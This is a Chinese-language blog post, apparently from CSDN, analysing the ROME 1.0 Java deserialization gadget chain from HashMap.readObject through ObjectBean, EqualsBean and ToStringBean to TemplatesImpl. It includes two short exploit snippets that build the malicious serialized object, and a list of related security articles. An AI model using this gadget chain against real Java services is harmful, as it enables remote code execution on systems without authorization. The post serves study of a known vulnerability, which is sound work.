Javaweb安全——反序列化漏洞-Rome

已于 2023-02-03 23:15:18 修改
阅读量345 收藏
点赞数
分类专栏: JavaWeb安全 文章标签: web安全
于 2023-01-30 22:27:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/128809785
版权

反序列化漏洞-rome

核心是 ToStringBean#toString()会调用其封装类的所有无参getter方法

依赖

<dependency>
    <groupId>rome</groupId>
    <artifactId>rome</artifactId>
    <version>1.0</version>
</dependency>

调用链分析

TemplatesImpl.getOutputProperties()
Method.invoke(Object, Object...)
ToStringBean.toString(String)
ToStringBean.toString()
ObjectBean.toString()
EqualsBean.beanHashCode()
ObjectBean.hashCode()

HashMap<K,V>.hash(Object)
HashMap<K,V>.readObject(ObjectInputStream)

可见关键部分在ToStringBean.toString(String),这里会遍历prefix的所有属性的无参 getter 方法,并进行反射调用。

image-20230130012609276

上面的调用也没啥好说的

com.sun.syndication.feed.impl.ToStringBean#toString()

image-20230130012836947

com.sun.syndication.feed.impl.ObjectBean#toString

image-20230130012754630

com.sun.syndication.feed.impl.EqualsBean#beanHashCode

image-20230130012733277

com.sun.syndication.feed.impl.ObjectBean#hashCode

image-20230130012657216

hashCode()的调用在之前CC链中很熟悉了,通过HashMap反序列化触发即可。

主要是看下com.sun.syndication.feed.impl.ObjectBean#ObjectBean(java.lang.Class, java.lang.Object)构造方法。

初始化时提供了一个 Class 类型和一个 Object 对象实例进行封装。其成员变量 EqualsBean/ToStringBean 类,分别为其提供了 equalshashCode / toString方法。

image-20230130013156899

exp

写起来也很简单,直接套两层ObjectBean即可

//获取恶意TemplatesImpl对象
TemplatesImpl obj = SerializeUtil.generateTemplatesImpl();

ObjectBean innerObjectBean = new ObjectBean(Templates.class,obj);
ObjectBean extObjectBean = new ObjectBean(ObjectBean.class,innerObjectBean);

Map expMap = new HashMap();
expMap.put(extObjectBean, "test");

不过这样写会有触发两次且有点臃肿,可以直接通过反射设置里面的类属性。

即通过反射设置EqualsBean#_objToStringBean,直接去调用ToStringBean#toString()去掉了中间的ObjectBean#toString

TemplatesImpl obj = SerializeUtil.generateTemplatesImpl();

ToStringBean toStringBean = new ToStringBean(Templates.class, obj);
EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);
ObjectBean extObjectBean = new ObjectBean(String.class,"test");

Map expMap = new HashMap();
expMap.put(extObjectBean, "test");
SerializeUtil.setFieldValue(extObjectBean,"_equalsBean",equalsBean);
Arnoldqqq
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[Java反序列化]rome反序列化学习
feng的博客
11-09 1260
前言 也算是忙里偷闲了,看了一下午的操作系统感觉自己就是傻子。。。晚上把前段时间的战疫比赛遇到的rome反序列化链给学习了一下,之后应该还是继续课内的学习,除了打打比赛,其他的学习得等到寒假了。 分析 从网上找了利用链: TemplatesImpl.getOutputProperties() NativeMethodAccessorImpl.invoke0(Method, Object, Object[]) NativeMethodAccessorImpl.invoke(Object, Object[])
ROME反序列化分析
qq_53263789的博客
03-29 632
title: ROME反序列化 categories: java反序列化 Rome Rome 就是为 RSS聚合开发的框架, 可以提供RSS阅读和发布器。 Rome 提供了 ToStringBean 这个类,提供深入的 toString 方法对JavaBean进行操作 Calc package bytecode; import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xs.
[Java反序列化]—Rome反序列化
Sentiment的博客
04-28 465
ROME可能是目前最完善的开源聚合工具,ROME支持绝大多数的RSS协议。
Rome反序列化
01-22 704
Rome反序列化 Gadget /* * Gadget: * HashMap#readObject * ObjectBean#hashCode * EqualsBean#beanHashCode * ToStringBean#toString * TemplatesImpl#getOutputProperties * */ HashMap#readObject 可以调用到任意一个类的 hashCode 方法,这里调用到的是 Obje
ROME反序列化-TemplatesImpl链子
chenxiaoyinaida的博客
11-10 399
前言: ROME 是一个可以兼容多种格式的 feeds 解析器,可以从一种格式转换成另一种格式,也可返回指定格式或 Java 对象。 正题: 这个链子是通过HashMap调用ObjectBean的hashCode()方法来完成RCE。 这里放一下链子会用到的一些必要代码,接下来进行相应的调试 public int hashCode() { return this._equalsBean.beanHashCode(); } 当调用hashCode之后会调用beanHashCode(),..
『Java安全反序列化-Rome 1.0反序列化POP链分析_ysoserial Rome payload分析
Ho1aAs‘s Blog
03-08 1883
文章目录前言版本代码审计 | 原理分析1. ToStringBean.toString()触发TemplatesImpl.getOutputProperties()手动调用ToStringBean.toString()示例代码2. EqualsBean.hashCode()触发toString()手动调用EqualsBean.hashCode()示例代码3. ObjectBean触发toString()或hashCode()手动调用ObjectBean.toString()和hashCode()示例代码4.
JavaWeb新版教程-html&CSS-L和CSS-表单格式化.avi
05-18
JavaWeb新版教程-html&CSS-L和CSS-表单格式化.avi
JavaWeb开发——JSP技术
03-24
此文章包含JSP简介、JSP运行原理、JSP标签与标签库及其使用、JSP的内置对象与作用域对象、EL表达式和MVC模式的简介,...适用于任何学习JavaWeb开发中,需要了解JSP技术的人群,希望这篇文章能对大家的学习有所帮助!
JavaWeb小项目——网上书城-附件资源
03-02
JavaWeb小项目——网上书城-附件资源
JavaWeb新版教程-html&CSS-L和CSS-表格的跨行跨列.avi
05-18
JavaWeb新版教程-html&CSS-L和CSS-表格的跨行跨列.avi
序列化和反序列化案例
weixin_40964170的博客
05-02 210
序列化:将java对象转化为可传输的字节数组 反序列化:将字节数组还原为java对象 为啥子要序列化? 序列化最终的目的是为了对象可以跨平台存储,和进行网络传输。而我们进行跨平台存储和网络传输的方式就是IO,而我们的IO支持的数据格式就是字节数组 什么情况下需要序列化? 凡是需要进行跨平台存储和网络传输的数据,都需要进行序列化 本质上存储和网络传输 都需要经过 把一个对象状态保存成一种跨平台识别的字节格式,然后其他的平台才可以通过字节信息解析还原对象信息 序列化的方式 序列化只是一种拆装组装对象的规则,这种
华为ROMA平台遇到的常见问题汇总
空城的博客
03-24 802
写完roma自定义后端,在自定义后端模块直接可以测试、发布、部署等操作,在这个界面点测试的时候要注意,可能我们自定义代码里有循环调用某些接口的逻辑,时间很容易超过15s,如果超过15s,就会返回timeout的错误,因此,如果报错了,可以去API管理模块进行调试,如果返回的数据集较大,后面的数据会被截断。roma的任务管理模块和自定义后端模块,如果是很多人协同开发的话,所有的任务都会显示,如果想查看只有自己开发的任务,是没有这个模块的,希望后面华为优化下吧。
“Roma225”网络间谍活动:利用RevengeRAT瞄准意大利汽车行业
mozhe_的博客
01-02 1746
最近,Cybaze-Yoroi ZLab的研究人员对一款针对意大利汽车行业的间谍恶意软件进行了分析。该恶意软件是通过钓鱼电子邮件传播的,攻击者试图伪装成巴西一家知名商业律师事务所的高级合伙人——Veirano Advogados。 恶意电子邮件的附件是一个PowerPoint外接程序文件(.ppa文件),包含能够自动运行的VBA宏代码。 图1:.ppa文件打开时显示的弹出窗口 技术分析 ...
Hessian 反序列化及相关利用链
晓得哥的博客
02-29 2306
作者:Longofo@知道创宇404实验室 时间:2020年2月20日 原文地址:https://paper.seebug.org/1131/#_2 前不久有一个关于Apache Dubbo Http反序列化漏洞,本来是一个正常功能(通过正常调用抓包即可验证确实是正常功能而不是非预期的Post),通过Post传输序列化数据进行远程调用,但是如果Post传递恶意的序列化数据就能进行恶意利用。Apa...
hessian序列化_dubbo provider 反序列化rce及补丁绕过
weixin_32734143的博客
01-20 210
01漏洞复现代码地址:https://github.com/hex0wn/learn-java-bug/tree/master/dubbo-poc环境:dubbo 2.7.6 + java 8u151 + rome 1.7.0下载测试代码,直接启动 provider开启jndi监听 https://github.com/welk1n/JNDI-Injection-Exploitjava ...
Java对象的序列化与反序列化
Rome was not built in one day
03-03 506
转自:http://www.hollischuang.com/archives/1150 序列化与反序列化 序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。一般将一个对象存储至一个储存媒介,例如档案或是记亿体缓冲等。在网络传输过程中,可以是字节或是XML等格式。而字节的或XML编码格式可以还原完全相等的对象。这个相反的过程又称为反序
反序列化工具_Hessian反序列化RCE漏洞复现及分析
weixin_40003512的博客
12-02 1408
Hessian是一个轻量级的RPC框架。它基于HTTP协议传输,使用Hessian二进制序列化,对于数据包比较大的情况比较友好。Hessian反序列化类似Java反序列化,可导致RCE,POC好像2017年就公开了,但是最新版本hessian-4.0.60.jar,经过测试也存在反序列化RCE问题。使用marshalsec项目工具(https://github.com/mbechler/...
Java反序列化漏洞-ROME利用链分析
l11III1111的博客
12-04 3416
直接看到执行getOutputProperties的方法 调用了BeanIntrospector.getPropertyDescriptors(_beanClass)获取_beanClass中的所有的getter和setter方法。其中_beanClass是我们在ObjectBean中传入的一个class类型的对象 具体获取getter和setter方法在getPDs的另一个重载了的方法里面 而我们知道TemplatesImpl的getOutputProperties前面是以get开头的满足这个格式,
自学黑客技术(网络安全
最新发布
dexi1113的博客
06-24 2773
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
javaWeb安全验证漏洞修复总结.doc
11-29
本文档是一份关于Java Web安全验证漏洞修复的详细总结,涵盖了多个常见的安全...这份文档提供了全面的Java Web安全漏洞修复指南,涵盖了从基础概念到具体实施方案,有助于Web开发者和安全人员有效提升系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值